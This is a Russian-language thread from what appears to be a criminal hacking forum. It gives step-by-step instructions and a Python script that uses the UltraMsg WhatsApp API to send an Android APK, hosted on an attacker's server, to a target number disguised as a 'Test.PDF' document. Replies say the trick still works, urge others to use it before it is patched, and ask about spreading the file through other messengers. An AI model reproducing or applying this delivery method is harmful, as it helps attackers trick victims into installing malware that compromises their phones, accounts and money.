• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Android (.apk) может распространяться через поддельный PDF-документ

whitehaker

RAID-массив
Пользователь
Реакции
111
Тут видео как работает и тут взято, не реклама, сюда видео не могу закинуть.
https://t.me/hacklair_Official/29

Вредоносное ПО для Android (.apk) может распространяться через поддельный PDF-документ, манипулируя расширением файла в приложении WhatsApp. Доказательство концепции (PoC) доступно в этом репозитории.

Шаг 1:
Сначала создайте бесплатную учетную запись на https://user.ultramsg.com/signup.php. Мы будем использовать её для управления API.

Шаг 2:
Нажмите кнопку «Add Instance» (Добавить экземпляр) и создайте новый экземпляр.

Шаг 3:
Заполните соответствующие поля в файле `wp.py` сгенерированной информацией об API и войдите в своё приложение WhatsApp, используя QR-код, найденный в информации об экземпляре.

Шаг 4:
Введите целевой номер в поле «enter number» (введите номер) и загрузите ваш файл на сервер (это может быть ngrok или python сервер. Если вы тестируете локально, вы можете использовать XAMPP).

Шаг 5:
Запустите Python-код и наблюдайте за отправкой сообщения.

Python:
import requests
import json

url = "https://api.ultramsg.com/instance../messages/document"

payload = {
    "token": "ultramsg token",
    "to": "enter number(target number)",
    "document": "your host(ex:https://08f8-185-177-126-102.ngrok-free.app/up/test.apk.)",
    "filename": "Test.PDF",
    "content_type": "application/vnd.android.package-archive",
    "priority": "10",
    "referenceId": "",
    "msgId": "",
    "mentions": ""
}

headers = {'Content-Type': 'application/json'}

response = requests.request("POST", url, data=json.dumps(payload), headers=headers)

print(response.text)

кто то практиковал уже?
хочется развернутый отзыв об этом
Уже практикуют, но тебе не напишут пока не заюзают фичу, зачем давать знать что это работает что бы прикрыли лавочку, так что мой совет бери и юзай а не жди когда тебе напишут что УЖЕ не работает ))
Сейчас и во время написании статьи работает.

Уже практикуют, но тебе не напишут пока не заюзают фичу, зачем давать знать что это работает что бы прикрыли лавочку, так что мой совет бери и юзай а не жди когда тебе напишут что УЖЕ не работает ))
Сейчас и во время написании статьи работает.
в общем, согласен. поэтому и хотел услышать отзыв. так как появилась статья, есть подозрения, что все это уже "отьебано" и работает через раз.

в общем, согласен. поэтому и хотел услышать отзыв. так как появилась статья, есть подозрения, что все это уже "отьебано" и работает через раз.
на данный момент работает

походу началось. тут про акк говорят, но я думаю, что дело в другом

1724238045970.png

Внимание, скам: мошенники изобрели новый развод в WhatsApp к 1 сентября — от лица знакомых они просят проголосовать за ребенка в школьном конкурсе рисунков.

Если жертва перейдет по ссылке и авторизуется — с аккаунтом можно попрощаться, а через него они могут завладеть и деньгами.

Покажите всем.

походу началось. тут про акк говорят, но я думаю, что дело в другом

Посмотреть вложение 93098

Внимание, скам: мошенники изобрели новый развод в WhatsApp к 1 сентября — от лица знакомых они просят проголосовать за ребенка в школьном конкурсе рисунков.

Если жертва перейдет по ссылке и авторизуется — с аккаунтом можно попрощаться, а через него они могут завладеть и деньгами.

Покажите всем.
Такой метод уже давно, наверное примерно 2015 году работал

ты
Такой метод уже давно, наверное примерно 2015 году работал
про то как АПК загнать через ПДФ(имею ввиду статью), или про то, что я скинул? возможно это 2 разных технологии. хз все таки, что там под ссылкой.
если с 15 года АПК так грузят, то аплодирую стоя мастерам!!!!!!!
вроде не первый год в деле и с АПК раньше работал, но такой метод не слышал.

ты

про то как АПК загнать через ПДФ(имею ввиду статью), или про то, что я скинул? возможно это 2 разных технологии. хз все таки, что там под ссылкой.
если с 15 года АПК так грузят, то аплодирую стоя мастерам!!!!!!!
вроде не первый год в деле и с АПК раньше работал, но такой метод не слышал.
не про APK а про то что ты скинул

Так только в воцапе можно или телега, почта тоже? Вообще есть возможность получить склепный файл и распространять по своим каналам ?

Так только в воцапе можно или телега, почта тоже? Вообще есть возможность получить склепный файл и распространять по своим каналам ?
Да

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх